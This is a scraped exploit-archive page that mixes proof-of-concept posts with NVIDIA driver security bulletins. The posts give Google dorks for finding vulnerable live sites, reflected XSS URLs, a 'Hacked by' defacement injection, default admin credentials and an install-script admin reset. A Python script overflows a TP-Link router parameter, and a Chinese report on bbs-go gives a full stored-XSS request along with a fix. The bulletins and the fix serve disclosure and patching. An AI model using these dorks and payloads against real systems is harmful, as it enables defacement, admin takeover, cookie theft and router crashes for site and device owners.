Adveris CMS version 3.0 suffers from a cross site scripting vulnerability.

**Adveris CMS 3.0 Cross Site Scripting**

Posted Jul 4, 2023

Authored by indoushka

Adveris CMS version 3.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | f4e69d15add89915deaf239446b331cc9106cc57ee69bf29f992d6be03d4d471

Download | Favorite | View

**Adveris CMS 3.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Adveris CMS v3.0 XSS Vulnerability                                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               | | # Vendor    : http://adveris.fr                                                                                                  |  | # Dork      : "Création site internet : Adveris" inurl:.php?id=                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /sous-categorie.php?id=6<--`<script>alert(/indoushka/);</script>``> --!>[+] http://w127.0.0.1/coveprofr/sous-categorie.php?id=6%3C--`%3Cscript%3Ealert(/indoushka/);%3C/script%3E``%3E%20--!%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,556)
*   Arbitrary (16,119)
*   BBS (2,859)
*   Bypass (1,725)
*   CGI (1,025)
*   Code Execution (7,203)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,329)
*   DoS (23,289)
*   Encryption (2,363)
*   Exploit (51,413)
*   File Inclusion (4,202)
*   File Upload (960)
*   Firewall (821)
*   Info Disclosure (2,742)
*   Intrusion Detection (888)
*   Java (3,007)
*   JavaScript (845)
*   Kernel (6,610)
*   Local (14,412)
*   Magazine (586)
*   Overflow (12,628)
*   Perl (1,423)
*   PHP (5,134)
*   Proof of Concept (2,336)
*   Protocol (3,571)
*   Python (1,526)
*   Remote (30,582)
*   Root (3,573)
*   Rootkit (506)
*   Ruby (611)
*   Scanner (1,633)
*   Security Tool (7,861)
*   Shell (3,168)
*   Shellcode (1,212)
*   Sniffer (893)
*   Spoof (2,193)
*   SQL Injection (16,254)
*   TCP (2,395)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,654)
*   Web (9,600)
*   Whitepaper (3,747)
*   x86 (961)
*   XSS (17,791)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,981)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,782)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (346)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,067)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (483)
*   RedHat (13,489)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,709)
*   UNIX (9,256)
*   UnixWare (186)
*   Windows (6,560)
*   Other

Adveris CMS 3.0 Cross Site Scripting

Advanced HRM version 1.6 allows for the reseting of the administrative password.

    ====================================================================================================================================| # Title     : Advanced HRM v1.6 Reset admin login Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 62.0.3 (32-bit)                                            || # Vendor    : https://codecanyon.net/item/advanced-hrm/17767006                                                                  |  | # Dork      : "Copyright © CoderPixel 2016 All Rights Reserved"                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] The Vulnerability revolves around resetting script settings and reformulating a new password for the admin .[+] use payload : /application/install/step5.php[+] http://127.0.0.1/appchain.commy/hrm/application/install/step5.php[+] Congratulations!    You have just install Advance HRM!    To Login Admin Portal:    Use this link - http://127.0.0.1/appchain.commy/hrm/    Username: admin    Password: admin.passwordGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh     |=======================================================================================================================================

Advanced HRM 1.6 Insecure Direct Object Reference

ADMINA BULGARIA Ltd version 1.0 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : ADMINA BULGARIA Ltd v 1.0 Insecure Settings Vulnerability                                                          || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : http://admina.me/                                                                                                  |  | # Dork      : " ADMINA BULGARIA Ltd.. All Rights Reserved. ."                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] user : admina & pass : 0000[+] http://127.0.0.1/res-clusterorg/admina/ <====| LoginGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

ADMINA BULGARIA Ltd 1.0 Insecure Settings

Active Super Shop version 1.5.1 suffers from an html injection vulnerability.

    ====================================================================================================================================| # Title     : Active super shop v1 5.1 HTML inject Vulnerability                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            | | # Vendor    : https://activeitzone.com/demo/shop/                                                                                |  | # Dork      : "Home || Active Super Shop"                                                                                        |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Register new member .[+] go to edit your profil https://127.0.0.1/3woru/home/profile/[+] edit your profil , put your code or use this code for test in First Name case or Last Name or ...etc :<marquee><font color=lime size=32>Hacked by indoushka</font></marquee></tr><td align="center"><a href="https://cxsecurity.com/author/indoushka/1/"><img src="https://cert.cx/cxstatic/images/12018/cxseci.png" alt="" width="650" height="120" border="0"></a></tr>Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* shadow_00715* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh   |                                                                                                                                              |=======================================================================================================================================

Active Super Shop 1.5.1 HTML Injection

Aathesh Soft CMS version 0.3.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Aathesh Soft CMS v0.3.0 XSS Vulnerability                                                                          || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://aatheshsoft.com                                                                                            || # Dork      : intext:''Developed by Aathesh Soft Infotech Pvt Ltd''                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /search.php?search=e%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(939443)%3C/ScRiPt%3E[+] http://127.0.0.1/ryncoorchidscom/search.php?search=e%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(939443)%3C/ScRiPt%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Aathesh Soft CMS 0.3.0 Cross Site Scripting

Ariadna CMS version 0.3 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Ariadna CMS v.3 - XSS Vulnerability                                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            | | # Vendor    : http://ariadna3.com                                                                                                |  | # Dork      : intext:''Powered by ariadna3.com''                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] click 2 creat a Nouveau RDV & use payload : <marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] https://127.0.0.1/www.aytoatecaes/turismo/fotografia-galerias.php?ID=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E ====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

Ariadna CMS 0.3 Cross Site Scripting


NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager (vGPU plugin), where a guest OS may be able to control resources for which it is not authorized, which may lead to information disclosure and data tampering.



**Details**

This section provides a summary of potential vulnerabilities that this security update addresses and their impact. Descriptions use CWE™, and base scores and vectors use CVSS v3.1 standards.

**NVIDIA GPU Display Driver**

**CVE ID**

**Description**

**Base Score**

**Vector**

CVE-2022-34671

NVIDIA GPU Display Driver for Windows contains a vulnerability in the user-mode layer, where an unprivileged user can cause an out-of-bounds write, which may lead to code execution, information disclosure, and denial of service.

8.5

CWE: 787  
AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

CVE‑2023‑25515

NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability where unexpected untrusted data is parsed, which may lead to code execution, denial of service, escalation of privileges, data tampering, or information disclosure.

7.8

CWE: 822  
AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE‑2023‑25516

NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer, where an unprivileged user can cause an integer overflow, which may lead to information disclosure and denial of service.

7.1

CWE: 190  
AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H

**NVIDIA vGPU Software**

**CVE ID**

**Description**

**Base Score**

**Vector**

CVE‑2023‑25517

NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager (vGPU plugin), where a guest OS may be able to control resources for which it is not authorized, which may lead to information disclosure and data tampering.

7.1

CWE: 285  
AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

The NVIDIA risk assessment is based on an average of risk across a diverse set of installed systems and may not represent the true risk to your local installation. NVIDIA recommends consulting a security or IT professional to evaluate the risk to your specific configuration.

**Security Updates for NVIDIA GPU Display Driver****CVE IDs Addressed in Each Windows Driver Branch**

The following table lists the CVE IDs addressed by the update in each Windows driver branch.

**Windows Driver Branch**

**CVE IDs Addressed**

R535, R525, R470, R450

CVE-2022-34671, CVE‑2023‑25515

**Security Updates for NVIDIA GPU Windows Display Driver**

The following table lists the NVIDIA software products affected, Windows driver versions affected, and the updated version available from nvidia.com that includes this security update. Download the updates from the NVIDIA Driver Downloads page.

**Software Product**

**Operating System**

**Driver Branch**

**Affected Driver Versions**

**Updated Driver Version**

GeForce

Windows

R535

All driver versions prior to 536.23

536.23

Windows 10 and 11

R470

All drivers versions prior to 474.44 for support of GeForce Kepler desktop

474.44

Windows 7 and 8._x_

R470

All driver versions prior to 474.44

474.44

Studio

Windows

R535

All driver versions

Available the week of June 29, 2023

NVIDIA RTX, Quadro, NVS

Windows

R535

All driver versions prior to 536.25

536.25

R525

All driver versions prior to 529.11

529.11

R470

All driver versions prior to 474.44

474.44

Tesla

Windows

R535

All driver versions prior to 536.25

536.25

R525

All driver versions prior to 529.11

529.11

R470

All driver versions prior to 474.44

474.44

R450

All driver versions prior to 454.23

454.23

**CVE IDs Addressed in Each Linux Driver Branch**

The following table lists the CVE IDs addressed by the update in each Linux driver branch.

**Linux Driver Branch**

**CVE IDs Addressed**

R535, R525, R470, R450

CVE‑2023‑25515, CVE‑2023‑25516

**Security Updates for NVIDIA GPU Linux Display Driver**

The following table lists the NVIDIA software products affected, Linux driver versions affected, and the updated version available from nvidia.com that includes this security update. Download the updates from the NVIDIA Driver Downloads page.

**Software Product**

**Operating System**

**Driver Branch**

**Affected Driver Versions**

**Updated Driver Version**

GeForce

Linux

R535

All driver versions prior to 535.54.03

535.54.03

R525

All driver versions prior to 525.125.06

525.125.06

R470

All driver versions prior to 470.199.02

470.199.02

NVIDIA RTX, Quadro, NVS

Linux

R535

All driver versions prior to 535.54.03

535.54.03

R525

All driver versions prior to 525.125.06

525.125.06

R470

All driver versions prior to 470.199.02

470.199.02

Tesla

Linux

R535

All driver versions prior to 535.54.03

535.54.03

R525

All driver versions prior to 525.125.06

525.125.06

R470

All driver versions prior to 470.199.02

470.199.02

R450

All driver versions prior to 450.248.02

450.248.02

**Notes**

*   Your computer hardware vendor may provide you with Windows GPU display driver versions including 536.19,531.87, 529.08, 574.44, and 454.23, which also contain the security updates.
*   The tables above may not be a comprehensive list of all affected supported versions or branch releases and may be updated as more information becomes available.
*   Earlier software branch releases that support these products may also be affected. If you are using an earlier branch release for which an update version is not listed above, upgrade to the latest branch release.

**Security Updates for NVIDIA vGPU Software****CVE IDs Addressed in Each Windows vGPU Driver Branch**

The following table lists the CVE IDs addressed by the update in each Windows driver branch.

**Windows Driver Branch**

**CVE IDs Addressed**

R535, R525, R470, R450

CVE-2022-34671, CVE‑2023‑25515

**CVE IDs Addressed in Each Linux vGPU Driver Branch**

The following table lists the CVE IDs addressed by the update in each Linux vGPU driver branch

**Linux Driver Branch**

**CVE IDs Addressed**

R535, R525, R470, R450

CVE‑2023‑25516

**CVE IDs Addressed in Each vGPU Manager Driver Branch**

The following table lists the CVE IDs addressed by the update in each vGPU Manager driver branch

**vGPU Manager Driver Branch**

**CVE IDs Addressed**

R535, R525

CVE‑2023‑25516, CVE‑2023‑25517

R470, R450

CVE‑2023‑25516

**Affected Products, Affected Versions, and Updated Versions**

The following table lists NVIDIA software products affected, versions affected, and the updated version that includes this security update.

**CVE IDs Addressed**

**Software Product**

**Operating System**

**Affected Versions**

Updated Version

**vGPU Software**

**Driver**

vGPU Software

Driver

CVE-2022-34671  
CVE‑2023‑25515

vGPU software (guest driver)

Windows

All versions prior to and including 15.2

528.89

15.3

529.11

All versions prior to and including 13.7

474.30

13.8

474.44

All versions prior to and including 11.12

454.14

11.13

454.23

CVE‑2023‑25516

vGPU software (guest driver)

Linux

All versions prior to and including 15.2

525.105.17

15.3

525.125.06

All versions prior to and including 13.7

470.182.03

13.8

470.199.02

All versions prior to and including 11.12

450.236.01

11.13

450.248.02

CVE‑2023‑25516  
CVE‑2023‑25517

vGPU software (Virtual GPU Manager)

Citrix Hypervisor, VMware vSphere, Red Hat Enterprise Linux KVM

All versions prior to and including 15.2

525.105.14

15.3

525.125.03

All versions prior to and including 13.7

470.182.02

13.8

470.199.03

All versions prior to and including 11.12

450.236.03

11.13

450.248.03

**Notes**

*   The table above may not be a comprehensive list of all affected supported versions or branch releases and may be updated as more information becomes available.
*   Earlier software branch releases that support these products may also be affected. If you are using an earlier branch release for which an update version is not listed above, upgrade to the latest branch release.

**Security Updates for NVIDIA Cloud Gaming****CVE IDs Addressed in Each Windows Cloud Gaming Driver Branch**

The following table lists the CVE IDs addressed by the update in each Windows driver branch.

**Windows Driver Branch**

**CVE IDs Addressed**

R535, R525, R470, R450

CVE-2022-34671, CVE‑2023‑25515

**CVE IDs Addressed in Each Linux Cloud Gaming Driver Branch**

The following table lists the CVE IDs addressed by the update in each Linux Cloud Gaming driver branch

**Linux Driver Branch**

**CVE IDs Addressed**

R535, R525, R470, R450

CVE-2022-34671, CVE‑2023‑25515

**CVE IDs Addressed in Each Cloud Gaming Manager Driver Branch**

The following table lists the CVE IDs addressed by the update in each Cloud Gaming Manager driver branch

**vGPU Manager Driver Branch**

**CVE IDs Addressed**

R535, R525

CVE‑2023‑25516, CVE‑2023‑25517

R470, R450

CVE‑2023‑25516

The following table lists the NVIDIA software products affected, versions affected, and the updated version that includes this security update.

**CVE IDs Addressed**

**Software Product**

**Operating System**

**Affected Versions**

**Updated Version**

**Cloud Gaming Software**

**Driver**

**Cloud Gaming Software**

**Driver**

CVE-2022-34671  
CVE‑2023‑25515

NVIDIA Cloud Gaming (guest driver)

Windows

All versions prior to and including May 2023 release

All versions prior to 531.79

June 2023 release

536.25

CVE‑2023‑25516

NVIDIA Cloud Gaming (guest driver)

Linux

All versions prior to and including May 2023 release

All versions prior to 530.51

June 2023 release

535.54.03

CVE‑2023‑25516  
CVE‑2023‑25517

NVIDIA Cloud Gaming (Virtual GPU Manager)

Red Hat Enterprise Linux KVM

All versions prior to and including May 2023 release

All versions prior to 530.51

June 2023 release

535.54.06

**Acknowledgements**

NVIDIA thanks the following people for reporting these issues:

CVE-2022-34671: Piotr Bania - Cisco Talos

**Get the Most Up to Date Product Security Information**

Visit the NVIDIA Product Security page to

*   Subscribe to security bulletin notifications
*   See the current list of NVIDIA security bulletins
*   Report a potential security issue in any NVIDIA supported product
*   Learn more about the vulnerability management process followed by the NVIDIA Product Security Incident Response Team (PSIRT)

**Revision History**

  

**Revision**

**Date**

**Description**

1.0

June 26, 2023

Initial release

**Support**

If you have any questions about this security bulletin, contact NVIDIA Support.

**Frequently Asked Questions (FAQs)**

How do I determine which NVIDIA display driver version is currently installed on my PC?

**Disclaimer**

ALL NVIDIA INFORMATION, DESIGN SPECIFICATIONS, REFERENCE BOARDS, FILES, DRAWINGS, DIAGNOSTICS, LISTS, AND OTHER DOCUMENTS (TOGETHER AND SEPARATELY, “MATERIALS”) ARE BEING PROVIDED “AS IS.” NVIDIA MAKES NO WARRANTIES, EXPRESS, IMPLIED, STATUTORY, OR OTHERWISE WITH RESPECT TO THE MATERIALS, AND ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS AND WARRANTIES, INCLUDING ANY IMPLIED WARRANTY OR CONDITION OF TITLE, MERCHANTABILITY, SATISFACTORY QUALITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT, ARE HEREBY EXCLUDED TO THE MAXIMUM EXTENT PERMITTED BY LAW.

Information is believed to be accurate and reliable at the time it is furnished. However, NVIDIA Corporation assumes no responsibility for the consequences of use of such information or for any infringement of patents or other rights of third parties that may result from its use. No license is granted by implication or otherwise under any patent or patent rights of NVIDIA Corporation. Specifications mentioned in this publication are subject to change without notice. This publication supersedes and replaces all information previously supplied. NVIDIA Corporation products are not authorized for use as critical components in life support devices or systems without express written approval of NVIDIA Corporation.

CVE-2023-25517: NVIDIA Support




NVIDIA CUDA toolkit for Linux and Windows contains a vulnerability in the nvdisasm binary file, where an attacker may cause a NULL pointer dereference by providing a user with a malformed ELF file. A successful exploit of this vulnerability may lead to a partial denial of service.





**Details**

This section summarizes the potential vulnerabilities that this security update addresses and their impact. Descriptions use CWE™, and base scores and vectors follow CVSS v3.1 standards.

**CVE ID**

**Description**

**Base Score**

**Vector and CWE**

CVE‑2023‑25523

NVIDIA CUDA toolkit for Linux and Windows contains a vulnerability in the nvdisasm binary file, where an attacker may cause a NULL pointer dereference by providing a user with a malformed ELF file. A successful exploit of this vulnerability may lead to a partial denial of service.

3.3

AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L  
CWE-476

The NVIDIA risk assessment is based on an average of risk across a diverse set of installed systems and may not represent the true risk to your local installation. NVIDIA recommends evaluating the risk to your specific configuration.

**Security Updates**

The following table lists the software products and versions affected, and the updated version available from nvidia.com that includes this security update.

Download the update from the CUDA Toolkit Downloads page to apply the security update.

**CVEs Addressed**

**Software Product**

**Operating System**

**Affected Versions**

**Updated Version**

CVE‑2023‑25523

NVIDIA CUDA Toolkit

Linux, Windows

All versions prior to CUDA Toolkit v12.2

CUDA Toolkit v12.2

**Notes**

*   Earlier software releases of this product are also affected. If you are using an earlier release, upgrade to the latest release version.

**Acknowledgements**

NVIDIA thanks the following people for reporting these issues:

CVE‑2023‑25523: Jifan Xiao

**Get the Most Up to Date Product Security Information**

Visit the NVIDIA Product Security page to

*   Subscribe to security bulletin notifications
*   See the current list of NVIDIA security bulletins
*   Report a potential security issue in any NVIDIA supported product
*   Learn more about the vulnerability management process followed by the NVIDIA Product Security Incident Response Team (PSIRT)

**Revision History**

  

**Revision**

**Date**

**Description**

1.0

June 29, 2023

Initial release

**Support**

If you have any questions about this security bulletin, contact NVIDIA Support.

**Disclaimer**

ALL NVIDIA INFORMATION, DESIGN SPECIFICATIONS, REFERENCE BOARDS, FILES, DRAWINGS, DIAGNOSTICS, LISTS, AND OTHER DOCUMENTS (TOGETHER AND SEPARATELY, “MATERIALS”) ARE BEING PROVIDED “AS IS.” NVIDIA MAKES NO WARRANTIES, EXPRESS, IMPLIED, STATUTORY, OR OTHERWISE WITH RESPECT TO THE MATERIALS, AND ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS AND WARRANTIES, INCLUDING ANY IMPLIED WARRANTY OR CONDITION OF TITLE, MERCHANTABILITY, SATISFACTORY QUALITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT, ARE HEREBY EXCLUDED TO THE MAXIMUM EXTENT PERMITTED BY LAW.

Information is believed to be accurate and reliable at the time it is furnished. However, NVIDIA Corporation assumes no responsibility for the consequences of use of such information or for any infringement of patents or other rights of third parties that may result from its use. No license is granted by implication or otherwise under any patent or patent rights of NVIDIA Corporation. Specifications mentioned in this publication are subject to change without notice. This publication supersedes and replaces all information previously supplied. NVIDIA Corporation products are not authorized for use as critical components in life support devices or systems without express written approval of NVIDIA Corporation.

CVE-2023-25523: NVIDIA Support

TP-Link TL-WR940N version 4 suffers from a buffer overflow vulnerability.

    # Exploit Title: TP-Link TL-WR940N V4 - Buffer OverFlow# Date: 2023-06-30# country: Iran# Exploit Author: Amirhossein Bahramizadeh# Category : hardware# Dork : /userRpm/WanDynamicIpV6CfgRpm# Tested on: Windows/Linux# CVE : CVE-2023-36355import requests# Replace the IP address with the router's IProuter_ip = '192.168.0.1'# Construct the URL with the vulnerable endpoint and parameterurl = f'http://{router_ip}/userRpm/WanDynamicIpV6CfgRpm?ipStart='# Replace the payload with a crafted payload that triggers the buffer overflowpayload = 'A' * 5000  # Example payload, adjust the length as needed# Send the GET request with the crafted payloadresponse = requests.get(url + payload)# Check the response status codeif response.status_code == 200:    print('Buffer overflow triggered successfully')else:    print('Buffer overflow not triggered')

TP-Link TL-WR940N 4 Buffer Overflow

Cross Site Scripting vulnerability in mlogclub bbs-go v. 3.5.5. and before allows a remote attacker to execute arbitrary code via a crafted payload to the comment parameter in the article function.

**漏洞名称**  
bbs-go 存储式跨站脚本漏洞

**受影响实体版本号**  
bbs-go <= 3.5.5

**漏洞类型**  
存储式跨站脚本

**危害等级**  
高危

**漏洞简介**  
bbs-go是一个使用Go语言搭建的开源社区系统，采用前后端分离技术，Go语言提供api进行数据支撑，用户界面使用Nuxt.js进行渲染，后台界面基于element-ui。  
bbs-go存在存储式跨站脚本漏洞，该漏洞源于程序未正确处理来自用户的输入。用户注册后在文章评论处可以注入恶意javascript脚本，管理员在管理端-内容管理-文章管理处点击查看评论时触发恶意脚本，导致泄露cookie等信息。  
以下产品及版本受到影响：bbs-go <= 3.5.5  
bbs-go的下载地址：https://github.com/mlogclub/bbs-go

**漏洞验证**  
前置条件：用户注册登录  
步骤：

1.  运行bbs-go = 3.5.5环境
2.  配置burpsuite抓包
3.  前台注册一个用户test4：

4.  test4登录
5.  点击“文章”，找到一篇文章，或者自己发表一篇文章

6.  评论，输入payload:并发布

完整请求报文：  
POST /api/comment/create HTTP/1.1  
Host: 192.168.111.130:3000  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0  
Accept: application/json, text/plain, _/_  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
X-Client: bbs-go-site  
X-User-Token: 1c1c47cb70f447589944117cb339518b  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 100  
Origin: http://192.168.111.130:3000  
Connection: close  
Referer: http://192.168.111.130:3000/article/4  
Cookie: Hm\_lvt\_79b8ff82974d0769ef5c629e4cd46629=1677550437; Hm\_lpvt\_79b8ff82974d0769ef5c629e4cd46629=1677639532; Admin-Token=57581e925fad47688596c13f8a48803d; userToken=1c1c47cb70f447589944117cb339518b

entityType=article&entityId=4&content=%3Cimg%20src%20onerror%3Dalert%28123%29%3E&imageList=&quoteId=  
7\. 使用管理员账号admin/123456登录管理端，点击内容管理-文章管理，选择这篇文章，查看评论

触发XSS

**修复建议**  
bbs-go\\server\\controllers\\admin\\comment\_controller.go:71  
改为builder.Put("content", html.EscapeString(comment.Content))  
对comment.Content进行html实体编码可临时解决该漏洞。

Tag

#windows